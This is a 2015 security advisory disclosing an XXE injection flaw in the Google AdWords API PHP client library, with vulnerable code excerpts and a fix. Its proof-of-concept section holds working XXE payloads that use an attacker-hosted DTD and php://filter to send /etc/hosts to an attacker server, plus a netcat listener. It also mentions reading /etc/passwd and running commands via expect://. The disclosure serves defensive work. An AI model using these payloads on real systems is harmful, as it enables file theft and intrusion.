Google AdWords API PHP Client Library 6.2.0 XXE Injection

`Advisory URL:  
  
  
  
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt  
  
  
  
  
  
=============================================  
- Release date: 06.11.2015  
- Discovered by: Dawid Golunski  
- Severity: Medium/High  
=============================================  
  
  
I. VULNERABILITY  
-------------------------  
  
Google AdWords API client libraries - XML eXternal Entity Injection (XXE)  
  
Confirmed in googleads-php-lib <= 6.2.0 for PHP, AdWords libraries:  
googleads-java-lib for Java, and googleads-dotnet-lib for .NET are also likely  
to be affected.  
  
  
II. BACKGROUND  
-------------------------  
  
- AdWords API  
  
"The AdWords API is a collection of web services that you can use to build  
applications that manage AdWords accounts and their associated campaign data.  
While the AdWords API is based on SOAP 1.1, high-level client libraries are  
provided to help you develop applications more quickly."  
  
AdWords API client libraries are available for different platforms  
such as PHP, .NET, Java etc.  
  
These can be found at:  
  
https://developers.google.com/adwords/api/docs/clientlibraries  
  
III. INTRODUCTION  
-------------------------  
  
As Google AdWords is based on SOAP protocol that uses XML to transfer the data,  
client API libraries should have necessary preventions against XML eXternal  
Entity injection attacks. However, an independent research found the necessary  
preventions to be lacking in several Google AdWords API client libraries,  
which could allow XXE attacks on applications/servers that make use of them.  
  
XXE (XML eXternal Entity) attack is an attack on an application that parses XML  
input from untrusted sources using incorrectly configured XML parser.  
The application may be forced to open arbitrary files and/or network resources.  
Exploiting XXE issues on PHP applications may also lead to denial of service or  
in some cases (when an 'expect' PHP module is installed) lead to command  
execution.  
  
IV. DESCRIPTION  
-------------------------  
  
This advisory will focus on PHP version of the AdWords API client library.  
Other versions of the client library such as .NET and Java seem to be  
vulnerable in a similar way.  
  
googleads-php-lib contains the following function which queries WSDL from the  
remote google adwords server:  
  
---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---  
  
protected function loadWsdl($wsdlUri, $proxy = null) {  
// Set proxy.  
if ($proxy) {  
$opts = array(  
'http' => array(  
'proxy' => $proxy,  
'request_fulluri' => true  
)  
);  
$context = stream_context_get_default($opts);  
libxml_set_streams_context($context);  
}  
  
$this->dom = new DOMDocument();  
$this->dom->load($wsdlUri,  
LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE);  
  
$this->serviceNamespace =  
$this->dom->documentElement->getAttribute('targetNamespace');  
}  
  
-------------------------------------------------------  
  
The function connects to the API endpoint to get the WSDL document describing  
the functionality of the AdWords web service in XML.  
  
For security reasons Google AdWords API can only be accessed via HTTPS.  
However, the above code does not set appropriate SSL settings on the  
https:// stream context. It fails to assign Certificate Authority (CA),  
and turn the verify_peer option to ON.  
It uses the stream_context_get_default() to get the default context,  
which on all PHP versions below PHP 5.6.x (see references below) does not  
validate the CA by default.  
  
Because of this, applications using the AdWords API library may be tricked into  
retrieving data from untrusted sources pretending to be adwords.google.com.  
  
The above code does not provide any XXE injection attack prevention.  
It does not disable external entity processing. To make it worse,  
it specifically enables it via the LIBXML parameters provided to the  
dom->load() function so an XXE injection attack would work even on  
systems that have the newest and fully patched version of libxml library  
which does not process the entities by default.  
  
Another vulnerable part of the application is located in the code:  
  
---[ src/Google/Api/Ads/Common/Util/XmlUtils.php ]---  
  
public static function GetDomFromXml($xml) {  
set_error_handler(array('XmlUtils', 'HandleXmlError'));  
$dom = new DOMDocument();  
$dom->loadXML($xml,  
LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT | LIBXML_XINCLUDE);  
restore_error_handler();  
return $dom;  
}  
  
-----------------------------------------------------  
  
which is used by the AdsSoapClient class to process SOAP requests. It  
also activates the ENTITY processing even if libxml parser is set to  
ingore them by default. AdsSoapClient can be configured to verify SSL peer  
in SSL communication via the settings INI file but this option is set to  
off by default.  
  
These SSL settings, and the XML ENTITY processing combined make applications  
using the AdWords API vulnerable to XXE injection attacks.  
  
For the attack to be successful, an attacker needs to  
perform a MitM attack to impersonate adwords.google.com server (eg. via DNS  
poisoning/spoofing/proxy attacks, ARP spoofing, etc.) to inject malicious  
XML input.  
  
  
V. PROOF OF CONCEPT  
-------------------------  
  
Below is a test application that makes use of the PHP Google AdWords API  
library.  
  
The application simply connects to the AdWords API endpoint to retrieve the  
WSDL document.  
  
---[ testAPI.php ]---  
  
<?php  
// Test application reading WSDL from Google AdWords  
  
set_include_path('./build_lib/WSDLInterpreter/');  
require_once 'WSDLInterpreter.php';  
  
$wsdlUri = 'https://adwords.google.com/api/adwords/cm/v201502/'  
.'CampaignService?wsdl';  
  
$wsdlInterpreter = new WSDLInterpreter($wsdlUri, "AdWordsSoapClient",null,  
null, "CampaignService", "v201502", "Ads_Google",  
"./src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php", null, true, null);  
  
?>  
  
---------------------  
  
  
To exploit this application, an attacker needs to perform a MitM attack to  
impersonate adwords.google.com server, as mentioned in the introduction.  
For simplicity, we can add the following entry to /etc/hosts on the victim's  
server:  
  
192.168.57.12 adwords.google.com  
  
to simulate a successful MitM attack where attacker successfully manages  
to ,for example, poison the DNS cache to point the adwords subdomain at his  
malicious web server (192.168.57.12).  
  
The attacker then needs to create a malicious XML file on his server to  
return it to the victim. Example payload could look as follows:  
  
$ curl --insecure  
'https://192.168.57.12/api/adwords/cm/v201502/CampaignService?wsdl'  
  
<?xml version="1.0"?>  
<!DOCTYPE root  
[  
<!ENTITY xxetest SYSTEM "http://192.168.57.12/adwords_xxe_hack.dtd">  
]>  
<test><testing>&xxetest;</testing></test>  
  
  
The XML payload returned by the attacker will cause the vulnerable  
AdWords API library to resolve the 'xxetest' entity and connect  
back to the attacker's server to retrieve adwords_xxe_hack.dtd.  
  
  
This can be verified on the victim's server by executing the demonstrated  
testAPI.php script:  
  
$ curl http://victims_server/googleads-php-lib-master/testAPI.php  
  
  
The script will try to retrieve the WSDL/XML document from adwords.google.com  
which will provide the above malicious XML.  
After the injected entity is read, the attacker will get a connection from the  
victim:  
  
attacker@mitm# nc -vv -l 8080  
Connection from victims_server port 8080 [tcp/http-alt] accepted  
GET /adwords_xxe_hack.dtd HTTP/1.0  
Host: 192.168.57.12:8080  
  
  
At this point attacker could add other entities to carry out an Out of band  
XXE attack to read system files (such as /etc/passwd) located on the victim's  
server, or execute commands via expect:// PHP wrapper if the 'expect' module  
is enabled.  
  
  
For example, this payload:  
  
<?xml version="1.0"?>  
<!DOCTYPE test [  
<!ENTITY % file SYSTEM  
"php://filter/convert.base64-encode/resource=/etc/hosts">  
<!ENTITY % dtd SYSTEM "http://192.168.57.12/send.dtd">  
%dtd;  
]>  
<test><testing>test &send;</testing></test>  
  
with another file located on the attacker's file server:  
  
---[ send.dtd ]---  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM  
'http://192.168.57.12:8080/retrieved/%file;'>">  
%all;  
  
------------------  
  
would send the contents of the /etc/hosts file to the attacker.  
  
  
VI. BUSINESS IMPACT  
-------------------------  
  
The severity of this issue is lowered to medium/high despite as the XXE  
injection vulnerability in the code, the attacker must impersonate  
adwords.google.com server to be able to inject malicious XML.  
If there is a possibility for such an attack, the severity of the issue can  
grow to high/critical due to the exploitation possibilities through XXE  
injection.  
  
VII. SYSTEMS AFFECTED  
-------------------------  
  
The latest version of Google AdWords API PHP client library was confirmed to  
be vulnerable. The client libraries for other platforms seem to lack necessary  
XXE attack preventions too.  
For example, the Java version, did not set the  
'sax/features/external-general-entities' setting to off when creating an  
instance of the DocumentBuilderFactory class. And the .NET version of the  
AdWords API was missing explicit 'ProhibitDtd' setting on the XMLReader.  
  
Vulnerabilities were found in googleads-php-lib in versions below 5.9.0 and  
reported to Google in May 2015, they were just fixed in AdWords php library ver.  
6.3.0.  
  
VIII. SOLUTION  
-------------------------  
  
Install the latest version of the Google AdWords API library available for your  
platform, and tighten SSL settings by enabling SSL CA verification in the  
library settings file.  
  
IX. REFERENCES  
-------------------------  
  
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt  
  
https://developers.google.com/adwords/api/docs/clientlibraries  
  
https://github.com/googleads/googleads-php-lib  
  
https://developers.google.com/adwords/api/docs/  
  
PHP 5.6.x openssl certificates in PHP streams:  
http://php.net/manual/en/migration56.openssl.php  
  
http://legalhackers.com  
  
X. CREDITS  
-------------------------  
  
The vulnerability has been discovered by Dawid Golunski  
dawid (at) legalhackers (dot) com  
  
http://legalhackers.com  
  
XI. TIMELINE  
-------------------------  
  
May 18th, 2015: Advisory created and sent to Google Security Team  
  
Nov 5th, 2015: Google, after half a year, confirm the vulnerability  
has been patched  
  
Nov 6th, 2015: Advisory released publicly  
  
XII. LEGAL NOTICES  
-------------------------  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise. I accept no  
responsibility for any damage caused by the use or misuse of this information.  
  
  
`